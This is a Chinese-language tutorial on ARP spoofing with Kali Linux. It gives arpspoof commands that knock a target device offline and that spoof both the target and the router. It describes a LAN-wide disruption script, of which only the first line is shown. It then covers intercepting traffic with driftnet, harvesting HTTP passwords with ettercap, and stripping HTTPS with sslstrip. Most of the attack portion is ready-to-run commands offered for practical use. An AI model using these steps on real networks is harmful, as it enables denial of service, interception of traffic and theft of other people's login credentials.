ARP协议
ARP(Address Resolution Protocol,地址解析协议)是一个位于TCP/IP协议栈中的网络层,负责将某个IP地址解析成对应的MAC地址。
基本功能
通过目标设备的IP地址,查询目标设备的MAC地址,以保证通信的进行。
ARP攻击的局限性
ARP攻击仅能在以太网(局域网如:机房、内网、公司网络等)进行。
无法对外网(互联网、非本区域内的局域网)进行攻击。
ARP攻击的攻击原理
ARP攻击就是通过伪造IP地址和MAC地址实现ARP欺骗,能够在网络中产生大量的ARP通信量使网络阻塞,攻击者只要持续不断的发出伪造的ARP响应包就能更改目标主机ARP缓存中的IP-MAC条目,造成网络中断或中间人攻击。
准备工作
环境:kali-linux
工具:arpspoof
获取自己的网卡,IP,网关信息。
1 | ifconfig |
1 | ip a |
获取目标ip与网关信息。
1 | nmap -sP 10.3.138.1/24 |
断网攻击
1 | arpspoof -i eth0 -t 192.168.8.100 192.168.8.8 |
双向攻击(即欺骗靶机也欺骗路由器)
1 | arpspoof -i eth0 -t 192.168.8.8 192.168.8.100 |
攻击完成,此时被攻击手机无法上网。(ctrl+Z)(ctrl+C)可停止攻击
群体攻击
1 | vim arp.sh |
1 | #!/usr/bin/bash |
该群体攻击会造成局域网ip与mac地址混乱,任何设备(vnc,ssh,摄像头等联网设备)都不能与外界联网,且市场安全软件与策略不可防御,唯独渗透的kali能正常使用。慎用!!!
数据抓取
首先要开始IP转发功能,linux因为系统安全考虑,是不支持IP转发的,其配置文件写在/proc/sys/net/ipv4的ip_forward中。默认为0,接下来修改为1。
1 | echo 1 >/proc/sys/net/ipv4/ip_forward |
修改完成后不显示,但可以用 cat /proc/sys/net/ipv4/ip_forward
来确实是否修改成功。
抓取使用http协议的网页的图片
1 | driftnet -i eth0 |
弹出对话框!! eth0为监控网卡
http账户密码获取
1 | ettercap -Tp -i eth0 |
https账户密码获取
使https链接还原为http s
1 | sslstrip -a -f -k sslstrip |